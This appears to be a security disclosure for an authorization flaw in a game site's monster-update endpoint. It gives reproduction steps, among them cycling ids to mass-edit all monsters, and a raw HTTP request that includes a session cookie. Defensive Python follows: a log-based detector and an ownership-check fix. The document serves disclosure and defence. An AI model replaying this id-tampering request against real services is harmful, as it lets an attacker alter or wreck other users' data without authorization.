This repository was archived by the owner on Jul 4, 2023. It is now read-only.
Impact:
Any user with a valid session cookie can rewrite the data fields of any monster in the database, regardless of ownership or privacy settings.
Steps to Reproduce:
1. Fill in the required fields, then capture the packet generated by clicking the "Submit to DB" button (shown below).
2. Change the monster id (91 in the example packet) to an arbitrary number, or to a particular one if you have a specific enemy in mind and know its id.
3. Make arbitrary changes to the data fields, such as name, description, privacy, etc., then submit the packet.
4. Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass changes to all monsters.
```http
POST /updateMonster/91 HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 324
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monsterupdate/91
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESt2kQ.aPVNJtVkemmSxGB4I8usqrgEK90

strength=5&perception=5&fortitude=5&charisma=5&intelligence=5&dexterity=5&luck=5&name=hi+it%27s+me&level=1&role=Infantry&health=90&.nanites=90&shock=5&will=5&reflex=5&awareness=5&description="A+turtle+has+been+here...+and+here...+and+here..."&private=f
```
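While the permission fix below is the real remedy, a defender will also want to notice the mass-update pattern from the last step in server logs before it is fixed. The following is an added detection example, not code from the repository or the report: it parses constructed access-log lines (the line format and the `sess=` cookie fingerprint are assumptions) and flags any session that POSTs to `/updateMonster/<id>` for more than five distinct ids inside a one-minute window.

```python
"""Flag sessions that update many different monsters in a short window.

Added detection example; the log format below is constructed and assumed,
not the real site's format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines: timestamp, a short fingerprint of the
# session cookie (never the cookie itself), method, path and status.
SAMPLE_LOG = """\
2020-01-15T10:00:01Z sess=ab12 POST /updateMonster/91 200
2020-01-15T10:00:02Z sess=ab12 POST /updateMonster/92 200
2020-01-15T10:00:02Z sess=ab12 POST /updateMonster/93 200
2020-01-15T10:00:03Z sess=ab12 POST /updateMonster/94 200
2020-01-15T10:00:03Z sess=ab12 POST /updateMonster/95 200
2020-01-15T10:00:04Z sess=ab12 POST /updateMonster/96 200
2020-01-15T10:05:00Z sess=cd34 POST /updateMonster/7 200
2020-01-15T10:09:00Z sess=cd34 POST /updateMonster/7 200
2020-01-15T10:20:00Z sess=ef56 GET /monsterupdate/12 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sess=(?P<sess>\w+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)
UPDATE_RE = re.compile(r"^/updateMonster/(?P<mid>\d+)$")


def parse_update_events(log_text):
    """Return (timestamp, session, monster_id) for each POST /updateMonster/<id>."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        p = UPDATE_RE.match(m["path"])
        if not p:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["sess"], int(p["mid"])))
    return events


def find_mass_updaters(events, window=timedelta(minutes=1), max_distinct=5):
    """Map session -> largest number of distinct monster ids it updated inside
    any sliding window of the given length, for sessions above max_distinct.

    One user re-saving their own monster stays under the threshold; a script
    walking ids 1..N trips it on the sixth distinct id.
    """
    by_session = defaultdict(list)
    for ts, sess, mid in events:
        by_session[sess].append((ts, mid))

    flagged = {}
    for sess, items in by_session.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # Advance the window's left edge until the span fits inside it.
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {mid for _, mid in items[start:end + 1]}
            if len(distinct) > max_distinct:
                flagged[sess] = max(flagged.get(sess, 0), len(distinct))
    return flagged


if __name__ == "__main__":
    print(find_mass_updaters(parse_update_events(SAMPLE_LOG)))  # {'ab12': 6}
```

The threshold and window are tunable; the point is that a legitimate user edits a handful of monsters they own, while the cycling described in the report produces a long run of distinct ids from one session in seconds.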
Recommended fix:
Adding permission checks that prevent non-admin users from updating monsters they did not create would stop a bad actor holding a single non-admin session cookie from modifying monsters owned by other users.
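One way to implement the recommended ownership check, as an added example that is not the project's own code: a pure-Python model of the update handler with the vulnerable version beside the fixed one. The `Store`, `User` and `Monster` types, `make_store` and the handler names are assumptions; the in-memory store stands in for the site's database and the Flask-style request and session layer is left out.

```python
"""Ownership check for monster updates: vulnerable handler beside the fixed one.

Added example; the store, types and handler names are assumptions standing in
for the project's database and Flask-style route.
"""
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Maps to HTTP 403."""


class NotFound(Exception):
    """Maps to HTTP 404."""


@dataclass
class User:
    id: int
    is_admin: bool = False


@dataclass
class Monster:
    id: int
    owner_id: int
    name: str
    description: str = ""
    private: bool = False


@dataclass
class Store:
    users: dict = field(default_factory=dict)
    monsters: dict = field(default_factory=dict)


def make_store():
    """Constructed in-memory data: two ordinary users, one admin, two monsters."""
    store = Store()
    store.users = {1: User(1), 2: User(2), 99: User(99, is_admin=True)}
    store.monsters = {
        91: Monster(91, owner_id=1, name="Turtle", private=True),
        92: Monster(92, owner_id=2, name="Golem"),
    }
    return store


# Only these form fields may be written; anything else in the POST body is ignored.
UPDATABLE = {"name", "description", "private"}


def apply_form(monster, form):
    for key, value in form.items():
        if key not in UPDATABLE:
            continue
        if key == "private":
            value = value.lower() in ("t", "true", "1")
        setattr(monster, key, value)


def update_monster_vulnerable(store, session_user_id, monster_id, form):
    """Behaviour the report describes: a valid session is the only check."""
    if session_user_id not in store.users:
        raise Forbidden("no valid session")
    monster = store.monsters.get(monster_id)
    if monster is None:
        raise NotFound(monster_id)
    apply_form(monster, form)
    return monster


def update_monster_fixed(store, session_user_id, monster_id, form):
    """Recommended fix: the monster must belong to the session user, or the user is an admin."""
    user = store.users.get(session_user_id)
    if user is None:
        raise Forbidden("no valid session")
    monster = store.monsters.get(monster_id)
    if monster is None:
        raise NotFound(monster_id)
    if monster.owner_id != user.id and not user.is_admin:
        raise Forbidden(f"user {user.id} does not own monster {monster_id}")
    apply_form(monster, form)
    return monster
```

The check is deliberately done server-side on every request, keyed on the user id carried in the session rather than on anything in the form body, so changing the id in the URL or the POST fields does not bypass it. Whether a non-owner gets 403 or 404 is a design choice; answering 404 for monsters the caller may not see avoids confirming that private monsters exist.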